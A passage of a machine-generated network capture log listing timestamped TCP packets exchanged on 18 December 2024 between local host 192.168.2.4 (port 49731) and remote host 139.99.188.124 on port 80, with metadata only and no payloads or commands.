                                                          Dec 18, 2024 09:32:40.312556028 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.313621998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.313683987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.313734055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.314836979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.314946890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.314992905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.316107035 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.316196918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.316241980 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.317331076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.317416906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.317464113 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.318567991 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.318730116 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.318773985 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.319804907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.319892883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.319935083 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.321027994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.321168900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.321208954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.322248936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.322348118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.322391987 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.323570013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.323647022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.323689938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.324812889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.324903965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.324959993 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.325969934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.326076984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.326246977 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.327218056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.327344894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.327389002 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.328450918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.328555107 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.328589916 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.329646111 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.375390053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.456306934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456320047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456331968 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456342936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456355095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456367016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456389904 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.456424952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.457573891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.457866907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.457906961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.458755970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.458928108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.458969116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.460001945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.460259914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.460299969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.461218119 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461424112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461458921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.461580038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461591959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461631060 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.462510109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.462613106 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.462650061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.463736057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.463828087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.463907957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.465162992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.465183973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.465224028 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.466249943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.466317892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.466358900 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.467385054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.467551947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.467591047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.468571901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.468713045 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.468753099 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.469819069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.469885111 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.469930887 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.471014977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.471101046 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.471137047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.472207069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.472326994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.472368956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.473386049 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.473503113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.473541021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.474602938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.474714041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.474750042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.476046085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.476166964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.476202965 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.477174044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.477300882 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.477339029 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.478249073 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.478306055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.478367090 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.480859041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.481954098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.481991053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.483129025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483140945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483171940 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483185053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.483186007 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.483212948 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.484266043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.484457970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.484509945 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.485460997 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.485474110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.485518932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.486673117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.486866951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.486901045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.487838984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.488020897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.855092049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.856134892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.856338978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.856384039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.857361078 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.857466936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.857511044 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.858529091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.858679056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.858720064 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.859771013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.859868050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.859915018 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.860898018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.861028910 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.861082077 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.862128973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.862248898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.862288952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.863362074 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.863472939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.863513947 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.864559889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.864649057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.864696980 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.865712881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.865772009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.865817070 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.866976023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.867029905 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.867073059 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.868201017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.868288040 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.868330956 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.869347095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.869484901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.869527102 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.870532036 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.870709896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.870753050 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.871764898 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.871866941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.871911049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.873162985 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.873338938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.873380899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.874253988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.874310970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.874351025 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.875422001 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.875511885 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.875549078 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.876596928 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.876661062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.876698971 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.877769947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.877868891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.877912998 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.879084110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.879185915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.879228115 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.880291939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.880332947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.880374908 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.881381989 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.881493092 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.881532907 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.882605076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.882702112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.882742882 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.883800983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.883924007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.883968115 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.885025024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.885101080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.885143042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.886190891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.886310101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.886348963 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.887418032 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.887571096 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.887610912 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.888654947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.888844967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.888884068 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.889811993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.889895916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.889933109 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.891024113 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.891128063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.891165018 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.892215967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.892285109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.892330885 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.893465042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.893570900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.893615961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.894671917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.894747019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.894789934 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.895828009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.895924091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.895967007 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.897031069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.897128105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.897176027 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.898272038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.898389101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.898431063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.899436951 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.953619957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.028240919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028256893 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028408051 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.028637886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028704882 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.028747082 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.029901028 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.029990911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.030033112 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.031063080 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.031115055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.031164885 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.032371044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.032468081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.032510042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.033611059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.033701897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.033742905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.034775019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.034853935 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.034899950 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.035902023 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.036071062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.036113024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.037209988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.037331104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.037374973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.038295984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.038352013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.038393974 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.039541006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.039612055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.039653063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.040687084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.040839911 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.040891886 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.041882992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.042053938 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.042097092 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.043087006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.043188095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.043231964 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.044282913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.044401884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.044454098 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.045562983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.045629025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.045671940 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.046818018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.046868086 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.046902895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.047935009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.048080921 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.048122883 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.049107075 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.049222946 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.049263954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.050343990 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.050503016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.050544024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.051523924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.051692963 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.051734924 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.052742958 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.052757025 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.052798033 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.053967953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.054066896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.054107904 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.055164099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.055290937 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.055332899 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.056324959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.056443930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.056484938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.057533026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.057584047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.057625055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.058727026 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.058844090 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.058883905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.059942007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.060055971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.060106039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.061214924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.061326027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.061367035 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.062359095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.062463999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.062510967 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.063606977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.063698053 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.063743114 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.064766884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.064883947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.064934969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.065954924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.066123962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.066168070 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.067207098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.067331076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.067374945 CET4973180192.168.2.4139.99.188.124
